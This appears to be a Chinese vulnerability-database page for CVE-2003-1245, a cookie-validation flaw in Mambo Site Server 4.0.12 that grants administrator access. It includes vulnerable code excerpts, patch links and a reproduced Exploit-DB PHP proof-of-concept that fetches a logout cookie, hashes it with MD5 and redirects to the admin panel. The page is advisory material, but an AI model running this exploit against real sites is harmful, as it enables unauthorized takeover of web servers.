CVE-2003-1245
CVSS10.0
发布时间 :2003-12-31 00:00:00
修订时间 :2008-09-05 16:36:25
NMCOE    

[原文]index2.php in Mambo 4.0.12 allows remote attackers to gain administrator access via a URL request where session_id is set to the MD5 hash of a session cookie.


[CNNVD]Mambo Site Server Cookie信息确认漏洞(CNNVD-200312-380)

        
        Mambo Site Server是一款免费开放源代码WEB内容管理工具,由PHP编写。
        Mambo Site Server在进行授权访问的时候没有充分确认基于Cookie验证的信息,远程攻击者可以利用这个漏洞使用特殊Cookie访问管理页面。
        /administrator/index2.php脚本存在漏洞,如果用户知道会话表中的sessionid的情况下,就可以以管理员权限访问Mambo服务器。
        一般的PHP设计让你设置Cookie时,如果页面不被刷新Cookie是不会被更新的,Mambo SiteServer包含如下代码:
        setcookie("sessioncookie", "$sessionID");
        if ($HTTP_COOKIE_VARS["sessioncookie"]!="") {
         $query="INSERT into ".$dbprefix."session set
        session_id='$cryptSessionID', guest='', userid='$uid',
        usertype='$usertype', gid='$gid', username='$username'";
         $database->openConnectionNoReturn($query);
        }
        我们可以看到,Mambo SiteServer在插入sessionid到会话表之前会检查COOKIE是否设置,如果没有设置,就没有会话ID插入也就不能登录访问管理员目录,但是查看SessionCookie.php代码,我们可以看到只要你退出就会把sessionid插入:
        $current_time = time();
        if ($HTTP_COOKIE_VARS["sessioncookie"]==""){
         $randnum=getSessionID1();
         ...
         $cryptrandnum=md5($randnum);
         ...
         setcookie("sessioncookie", "$randnum");
         $guest=1;
         $query="INSERT into ".$dbprefix."session SET username='',
        time=$current_time, session_id='$cryptrandnum', guest=$guest";
         $database->openConnectionNoReturn($query);
        }
        因此,如果某个COOKIE按照下面的方法发送给浏览器(如某个人刚退出Mambo服务器):
        sessioncookie=nh54OQIZb8ybaA2CNNdU1046102063
        攻击者可以通过MD5加密此值,并以这个会话ID访问/administrator/index2.php脚本,就会认为我们以管理员登录:
        /administrator/index2.php?session_id=0ebda5bbba49dc226b4ed8fc801f1d98
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1245
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1245
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-380
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/6926
(PATCH)  BID  6926
http://xforce.iss.net/xforce/xfdb/11398
(UNKNOWN)  XF  mambo-sessionid-gain-privileges(11398)
http://archives.neohapsis.com/archives/bugtraq/2003-02/0302.html
(VENDOR_ADVISORY)  BUGTRAQ  20030224 Mambo SiteServer exploit gains administrative privileges

- 漏洞信息

Mambo Site Server Cookie信息确认漏洞
危急 访问验证错误
2003-12-31 00:00:00 2006-01-17 00:00:00
远程  
        
        Mambo Site Server是一款免费开放源代码WEB内容管理工具,由PHP编写。
        Mambo Site Server在进行授权访问的时候没有充分确认基于Cookie验证的信息,远程攻击者可以利用这个漏洞使用特殊Cookie访问管理页面。
        /administrator/index2.php脚本存在漏洞,如果用户知道会话表中的sessionid的情况下,就可以以管理员权限访问Mambo服务器。
        一般的PHP设计让你设置Cookie时,如果页面不被刷新Cookie是不会被更新的,Mambo SiteServer包含如下代码:
        setcookie("sessioncookie", "$sessionID");
        if ($HTTP_COOKIE_VARS["sessioncookie"]!="") {
         $query="INSERT into ".$dbprefix."session set
        session_id='$cryptSessionID', guest='', userid='$uid',
        usertype='$usertype', gid='$gid', username='$username'";
         $database->openConnectionNoReturn($query);
        }
        我们可以看到,Mambo SiteServer在插入sessionid到会话表之前会检查COOKIE是否设置,如果没有设置,就没有会话ID插入也就不能登录访问管理员目录,但是查看SessionCookie.php代码,我们可以看到只要你退出就会把sessionid插入:
        $current_time = time();
        if ($HTTP_COOKIE_VARS["sessioncookie"]==""){
         $randnum=getSessionID1();
         ...
         $cryptrandnum=md5($randnum);
         ...
         setcookie("sessioncookie", "$randnum");
         $guest=1;
         $query="INSERT into ".$dbprefix."session SET username='',
        time=$current_time, session_id='$cryptrandnum', guest=$guest";
         $database->openConnectionNoReturn($query);
        }
        因此,如果某个COOKIE按照下面的方法发送给浏览器(如某个人刚退出Mambo服务器):
        sessioncookie=nh54OQIZb8ybaA2CNNdU1046102063
        攻击者可以通过MD5加密此值,并以这个会话ID访问/administrator/index2.php脚本,就会认为我们以管理员登录:
        /administrator/index2.php?session_id=0ebda5bbba49dc226b4ed8fc801f1d98
        

- 公告与补丁

        厂商补丁:
        Mambo
        -----
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载升级程序到4.0.12 RC3及之后的版本:
        Mambo Mambo Site Server 4.0.12 RC2:
        Mambo Site Server Upgrade Mambo Site Server 4.0.12 RC3
        
        http://prdownloads.sourceforge.net/mambo/MamboV4.0.12-RC3.tar.gz?download

        Mambo Site Server Patch MamboV4.0.12-RC3-patch.tar.gz
        
        http://prdownloads.sourceforge.net/mambo/MamboV4.0.12-RC3-patch.tar.gz?download

        Mambo Upgrade Mambo Server 4.0.12
        
        http://sourceforge.net/project/showfiles.php?group_id=25577

- 漏洞信息 (22281)

Mambo Site Server 4.0.12 RC2 Cookie Validation Vulnerability (EDBID:22281)
php webapps
2003-02-24 Verified
0 Simen Bergo
N/A [点击下载]
source: http://www.securityfocus.com/bid/6926/info

Mambo Site Server may grant access without sufficiently validating cookie based authentication credentials. It has been reported that Mambo will accept a user cookie sent by the site as an administrative credential. To exploit this issue, the attacker must receive a cookie (such as the one issued during logout) and then use MD5 to encode their session ID in the cookie. The attacker may then access administrative pages using this cookie.

This issue was reported in Mambo Site Server 4.0.12 RC2. Earlier versions may also be affected. 

<?php 
/* 
���mamboexp.php - Mambo 4.0.12 RC2 exploit - Proof of concept 
���Copyright (C) 2003��Simen Bergo (sbergo@thesource.no) 
���This program is free software; you can redistribute it and/or 
���modify it under the terms of the GNU General Public License 
���as published by the Free Software Foundation; either version 2 of 
���the License or (at your option) any later version. 
���This program is distributed in the hope that it will be 
���useful, but WITHOUT ANY WARRANTY; without even the implied warranty 
���of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.��See the 
���GNU General Public License for more details. 
���You should have received a copy of the GNU General Public License 
���along with this program; if not, write to the Free Software 
���Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA��02111-1307, USA. 
*/ 
/* 
���The problem is that Mambo Site Server does not check whether or not 
���the sessionid is created by the administrator login, or any other 
���part of the website. 
���This program will first connect to /index.php?option=logout which 
���hands us a cookie. Then we will md5() encrypt this cookie and "login" 
���at the administrator section. 
*/ 
���� 
����# Check if form was submitted 
����if (isset ($_POST['submit'])) { 
��������# Connect to server 
��������$handle = fsockopen ($_POST['hostname'], 80, &$errno, &$errstr); 
��������# Halt processing if we we're unable to connect 
��������if (!$handle) { die ("Unable to connect to <b>$hostname</b>"); } 
��������else { 
������������# Get the webpage which will give us the cookie 
������������fputs ($handle, "GET /" . trim($_POST['maindir'], "\x5c \x2f") . "/index.php?option=logout HTTP/1.0\nHost: 
{$_POST['hostname']}\n\n"); 
������������# Loop through the contents 
������������$buffer = ""; 
������������while (!feof ($handle)) { 
����������������$buffer .= fgets ($handle, 2000); 
������������} 
������������# Create an array with each line as a seperate value 
������������$arr = explode ("\n", $buffer); 
������������# Loop through the array looking for the cookie 
������������foreach ($arr as $value) { 
����������������# If we have found the cookie, proceed 
����������������if (eregi ("Set-Cookie: sessioncookie=", $value)) { 
��������������������# Explode again, to sort out the sessionid 
��������������������$var = explode ("=", $value); 
��������������������# Now that we have all the information we need, we can redirect 
��������������������header ("Location: http://{$_POST['hostname']}/" . 
���������������������������� trim($_POST['admdir'], "\x5c \x2f") . "/index2.php?session_id=" . md5(trim($var[1]))); 
����������������} 
������������} 
��������} 
����} 
?> 
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST"> 
��<table border="0" cellspacing="0" cellpadding="0"> 
����<tr> 
������<td width="120" height="30">Hostname</td> 
������<td width="280" height="30"><input type="text" name="hostname" size="30" value="www.mamboserver.com"/></td> 
����</tr> 
����<tr> 
������<td width="120" height="30">Main directory</td> 
������<td width="280" height="30"><input type="text" name="maindir" size="30" value=""/></td> 
����</tr> 
����<tr> 
������<td width="120" height="30">Admin directory</td> 
������<td width="280" height="30"><input type="text" name="admdir" size="30" value="administrator"/></td> 
����</tr> 
����<tr> 
������<td width="120" height="30"></td> 
������<td width="280" height="30"><input type="submit" value="Gain access" name="submit"/> <input type="reset" 
value="Reset"/></td> 
����</tr> 
��</table> 
</form>
		

- 漏洞信息

7494
Mambo Open Source MD5 Hash Session ID Privilege Escalation

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-02-24 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站